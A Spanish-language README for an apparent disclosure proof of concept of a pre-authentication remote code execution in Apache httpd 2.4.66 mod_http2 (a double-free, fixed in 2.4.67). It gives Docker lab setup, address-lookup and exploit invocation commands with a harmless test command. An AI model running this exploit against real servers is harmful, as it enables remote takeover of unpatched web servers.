
Double-free en la limpieza de streams de Apache httpd mod_http2 que conduce a una RCE previa a la autenticación.
Doble liberación en la limpieza de flujos de mod_http2 de Apache httpd que conduce a una ejecución remota de código (RCE) sin autenticación.
Afectado: httpd 2.4.66 con mod_http2 y MPM de múltiples subprocesos (event/worker). Corregido en: 2.4.67.
Encontrado y reportado por Bartlomiej Dmitruk (striga.ai) y Stanislaw Strzalkowski (isec.pl).
Informe: https://striga.ai/research/apache-httpd-mod-http2-double-free
Construye e inicia el entorno vulnerable:
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
Obtén las direcciones de system() y del scoreboard:
docker exec httpd-poc python3 /getaddr.py 1
Ejecuta el exploit:
python3 poc.py --host localhost --port 9443 \
--cmd 'date >> /tmp/win' --workers 64 \
--system <system_addr> --scoreboard <scoreboard_addr>
Verifica (la ejecución es probabilística, puede tardar de minutos a horas):
docker exec httpd-poc cat /tmp/win
docker rm -f httpd-poc